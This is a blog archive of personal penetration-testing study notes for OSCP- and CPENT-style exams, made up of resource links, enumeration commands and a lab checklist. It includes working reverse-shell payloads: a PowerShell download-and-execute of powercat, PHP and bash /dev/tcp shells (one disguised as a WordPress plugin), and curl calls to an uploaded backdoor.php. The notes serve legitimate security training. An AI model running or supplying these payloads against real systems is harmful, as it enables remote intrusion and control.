
Showing posts from January 2025

[Collected web articles] Installing Python 2 programs on Kali

https://hack543.com/kali-linux-virtualenv-python2-exploit/
https://www.kali.org/docs/general-use/using-eol-python-versions/

[Pentest] Windows Enumeration

Find users on the local machine: net user
Find users in the domain: net user /domain
Get the information for a specific user in the domain: net user <username> /domain
Enumerate groups in the domain with net group: net group /domain
Enumerate the members of a group: net group "<group name>" /domain

CPENT exam resources

https://hackmd.io/@6AhJdzpGTyGDlAxru4jZbA/r1fLYbAx0?utm_source=preview-mode&utm_medium=rec
https://www.amazon.com/EC-Council-CPENT-Exam-Prep-Explanations/dp/B0DK5SNJBS
https://wiki.rice.edu/confluence/download/attachments/237338630/eccouncil-cpent-dumps-exam-questions-2025-perfect-resource-to-secure-success.html?api=v2
https://infosecjake.net/?p=355

SQL injection

 https://www.youtube.com/playlist?app=desktop&list=PLuyTk2_mYISLaZC4fVqDuW_hOk0dd5rlf

OSCP notes

https://blog.keniver.com/2023/01/oscp-exam-guide/
https://hackercat.org/oscp/oscp-review
https://ithelp.ithome.com.tw/m/articles/10354135
https://peterkan.tw/2024/02/15/all-about-oscp/
https://tech-blog.cymetrics.io/posts/crystal/oscp-review/
https://hackercat.org/oscp/buffer-overflows-made-easy-notes-oscp-preparation
https://hackmd.io/@7ZcmfE2ETz-ntel2Ma6uTg/SJsPftiB1x
https://www.youtube.com/watch?v=Rm73FZ0K01g&list=PLcSbj5mz-wxMIiOjtknvQDwKsL0XKHMbN
https://github.com/In3x0rabl3/OSCP
OSEP: https://github.com/In3x0rabl3/OSEP/blob/main/osep_reference.md
https://hackmd.io/@CHW/H1F8rLl5kg?utm_source=preview-mode&utm_medium=rec
1. Scan for vulnerabilities with nmap. Cover both TCP and UDP.
2. Click around the web pages; usable accounts may be sitting right on the page (extremely dumb username/password combinations).
3. Web directory brute force: gobuster dir -u http://192.168.219.197/ -w /usr/share/wordlists/dirb/common.txt
4. Check the web template for vulnerabilities (changing letter case may be enough to bypass the check).
5. Once in, immediately run (1) Linux: id (2) Windows: whoami /priv
6. crontab -l: check crontab and look for scripts.
7. Check whether the scripts contain plaintext credentials: A. grep -i sshpass B. grep -i ftp C. grep -i sf...

PowerShell

PowerShell one-liner reverse shell
https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58
PowerShell: fetch a remote file
IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell

[Pentest] Access Windows

xfreerdp /u: /d: /p: /v: /size:100% /cert:ignore

PHP reverse shell

$_GET['cmd']; die(); exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.228/4444 0>&1'");
=================
<?php
/**
Author: Kai
Plugin Name: PHP Code Plugin
Description: Shell Through Plugins
Version: 1.0
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.116.129/443 0>&1'");
?>
==================
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
==================
curl http://192.168.192.11/project/uploads/users/603339-backdoor.php --data-urlencode "cmd=/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.194/8888 0>&1'"
==================
Firefox URL
http://192.168.192.11/project/uploads/users/603339-backdoor.php?cmd=%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E45%2E194%2F8888%200%3E%261%27%0A%0A
==================
/usr/share/webshells/php
==================
weevely

wpscan

wpscan --url=http://xxx.xxx.xxx. -e u,p
wpscan --url=http://xxx.xxx.xxx. -e u,p --usernames username_file --passwords passwd_file

Pentest

[Host]
Nmap TCP scan
Nmap UDP scan
[Website]
Open it in a browser
Whatweb
Check the page source
Dirb/Gobuster/feroxbuster, try both with and without the trailing "/"
robots.txt/sitemap.xml
nmap -sVC
wappalyzer
[ReverseShell]
https://www.revshells.com/
Payloads_All_The_Things
PowerShell one-liner
Reverse shell generator
[Encode/Decode]
https://gchq.github.io/CyberChef/
https://jscompress.com/
[Linux Enum]
lynis
enum4linux
leysh
[Wordpress]
Core
Theme
Plug-in
[Web Form]
ffuf
OWASP ZAP
[XSS Script]
https://github.com/The-Art-of-Hacking/h4cker/blob/master/web_application_testing/xss_vectors.md
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
[AD Enumeration]
NETBIOS name: nbtstat -A IP
Mimikatz
psexec \\<IP>: cmd.exe
pth-exec(?)
winrm
nmap -n -sS -p 137,138,139,445 --script smb-os-discovery <IP>
[Remote Desktop]
xfreerdp /u:user /p:IP /v:ip /cert:ignore
[SAMBA]
nmap -sS -n -p 445 --script smb-protocols <IP>
Check Samba: net view \\IP
[Python Web Server]
python3 -m http.server 8080
[Linux es...